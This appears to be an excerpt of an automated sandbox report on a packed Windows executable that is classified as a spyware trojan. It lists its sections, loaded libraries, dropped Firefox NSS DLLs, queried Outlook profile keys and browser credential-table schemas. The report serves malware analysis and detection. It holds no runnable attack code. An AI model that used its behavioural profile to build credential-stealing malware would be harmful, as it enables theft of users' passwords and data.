Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1850609393.00000000297E2000.00000004.00000020.00020000.00000000.sdmp, FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C5AED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C5EB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C5EB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C5EB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C58F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072B04B	0_2_0072B04B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973	0_2_0075A973
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078C1BE	0_2_0078C1BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D0AF0	0_2_006D0AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00715B37	0_2_00715B37
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00688B11	0_2_00688B11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00788307	0_2_00788307
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078EBFE	0_2_0078EBFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D5B81	0_2_006D5B81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079247B	0_2_0079247B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063AC44	0_2_0063AC44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00666DF6	0_2_00666DF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00717673	0_2_00717673
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00790636	0_2_00790636
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00793E00	0_2_00793E00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00798EB8	0_2_00798EB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00697681	0_2_00697681
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FFF3A	0_2_006FFF3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5835A0	0_2_6C5835A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F545C	0_2_6C5F545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C595440	0_2_6C595440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C5C10	0_2_6C5C5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D2C10	0_2_6C5D2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FAC00	0_2_6C5FAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F542B	0_2_6C5F542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AD4D0	0_2_6C5AD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5964C0	0_2_6C5964C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6CF0	0_2_6C5C6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58D4E0	0_2_6C58D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596C80	0_2_6C596C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E34A0	0_2_6C5E34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EC4A0	0_2_6C5EC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B0512	0_2_6C5B0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AED10	0_2_6C5AED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59FD00	0_2_6C59FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C0DD0	0_2_6C5C0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E85F0	0_2_6C5E85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A9E50	0_2_6C5A9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C3E50	0_2_6C5C3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D2E4E	0_2_6C5D2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A4640	0_2_6C5A4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58C670	0_2_6C58C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6E63	0_2_6C5F6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7E10	0_2_6C5C7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D5600	0_2_6C5D5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9E30	0_2_6C5E9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58BEF0	0_2_6C58BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59FEF0	0_2_6C59FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F76E3	0_2_6C5F76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A5E90	0_2_6C5A5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EE680	0_2_6C5EE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4EA0	0_2_6C5E4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7710	0_2_6C5C7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C599F00	0_2_6C599F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B6FF0	0_2_6C5B6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58DFE0	0_2_6C58DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D77A0	0_2_6C5D77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A8850	0_2_6C5A8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AD850	0_2_6C5AD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CF070	0_2_6C5CF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C597810	0_2_6C597810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CB820	0_2_6C5CB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D4820	0_2_6C5D4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F50C7	0_2_6C5F50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AC0E0	0_2_6C5AC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C58E0	0_2_6C5C58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B60A0	0_2_6C5B60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AA940	0_2_6C5AA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DB970	0_2_6C5DB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FB170	0_2_6C5FB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59D960	0_2_6C59D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C5190	0_2_6C5C5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E2990	0_2_6C5E2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BD9B0	0_2_6C5BD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58C9A0	0_2_6C58C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C9A60	0_2_6C5C9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8AC0	0_2_6C5C8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A1AF0	0_2_6C5A1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE2F0	0_2_6C5CE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FBA90	0_2_6C5FBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59CAB0	0_2_6C59CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F2AB0	0_2_6C5F2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5822A0	0_2_6C5822A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B4AA0	0_2_6C5B4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C585340	0_2_6C585340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59C370	0_2_6C59C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CD320	0_2_6C5CD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F53C8	0_2_6C5F53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58F380	0_2_6C58F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5BCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003C45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5C94D0 appears 90 times

Source: file.exe, 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1938807492.000000006C805000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: jgktddvv ZLIB complexity 0.9950032302833078

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C5E7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_003D9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_003D3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\2DH1EAYP.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000003.1788130804.000000001D3B6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1787963890.000000001D3B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE autofill_profile_names ( guid VARCHAR, first_name VARCHAR, middle_name VARCHAR, last_name VARCHAR, full_name VARCHAR, honorific_prefix VARCHAR, first_last_name VARCHAR, conjunction_last_name VARCHAR, second_last_name VARCHAR, honorific_prefix_status INTEGER DEFAULT 0, first_name_status INTEGER DEFAULT 0, middle_name_status INTEGER DEFAULT 0, last_name_status INTEGER DEFAULT 0, first_last_name_status INTEGER DEFAULT 0, conjunction_last_name_status INTEGER DEFAULT 0, second_last_name_status INTEGER DEFAULT 0, full_name_status INTEGER DEFAULT 0, full_name_with_honorific_prefix VARCHAR, full_name_with_honorific_prefix_status INTEGER DEFAULT 0)p~;
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1777002432.000000001D3C4000.00000004.00000020.00020000.00000000.sdmp, CGIDHIIJKEBGHJJKFIDA.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938238128.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1828352 > 1048576

Source: file.exe

Static PE information: Raw size of jgktddvv is bigger than: 0x100000 < 0x198200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1938703463.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.3c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;jgktddvv:EW;rojuqcjw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;jgktddvv:EW;rojuqcjw:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003D9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1be700 should be: 0x1ca086

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: jgktddvv
Source: file.exe	Static PE information: section name: rojuqcjw
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003DB035 push ecx; ret	0_2_003DB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083E092 push edx; mov dword ptr [esp], ebp	0_2_0083E0BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083E092 push eax; mov dword ptr [esp], ecx	0_2_0083E0E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083E092 push 58D39AB1h; mov dword ptr [esp], ecx	0_2_0083E121
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083E092 push edx; mov dword ptr [esp], edi	0_2_0083E16F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00800899 push 62F815C3h; mov dword ptr [esp], eax	0_2_008008BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00800899 push esi; mov dword ptr [esp], ebx	0_2_00800906
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008778B5 push eax; mov dword ptr [esp], ebx	0_2_00877997
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072B04B push ebx; mov dword ptr [esp], edi	0_2_0072B0C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072B04B push ebx; mov dword ptr [esp], 77F7666Ch	0_2_0072B119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072B04B push edi; mov dword ptr [esp], 6FFBB810h	0_2_0072B160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072B04B push 601405C2h; mov dword ptr [esp], eax	0_2_0072B18B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0085781C push eax; mov dword ptr [esp], ebx	0_2_00857838
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007820B3 push ebp; mov dword ptr [esp], esi	0_2_007820C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D68AB push edi; mov dword ptr [esp], 21F5D485h	0_2_007D67CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D68AB push edi; mov dword ptr [esp], eax	0_2_007D682C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D68AB push 27D1E737h; mov dword ptr [esp], ebx	0_2_007D6834
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00823860 push ecx; mov dword ptr [esp], esi	0_2_0082393D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C988C push eax; mov dword ptr [esp], ecx	0_2_007C9B26
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088C874 push edi; mov dword ptr [esp], ebp	0_2_0088C8FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973 push 6962FCB2h; mov dword ptr [esp], esi	0_2_0075A99D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973 push ebp; mov dword ptr [esp], eax	0_2_0075AA51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973 push edx; mov dword ptr [esp], ebx	0_2_0075AA63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973 push 4BCED56Bh; mov dword ptr [esp], eax	0_2_0075AADD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973 push edi; mov dword ptr [esp], 3E41DBB3h	0_2_0075AAE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075A973 push 62ECB822h; mov dword ptr [esp], ebx	0_2_0075AB7B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079F95C push ecx; mov dword ptr [esp], 30EB68D6h	0_2_0079F98C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086A1D4 push ebp; mov dword ptr [esp], 7DDF2D86h	0_2_0086A338
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B910E push edi; mov dword ptr [esp], ebp	0_2_007B9177
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008349F6 push ecx; mov dword ptr [esp], esi	0_2_00834A5D
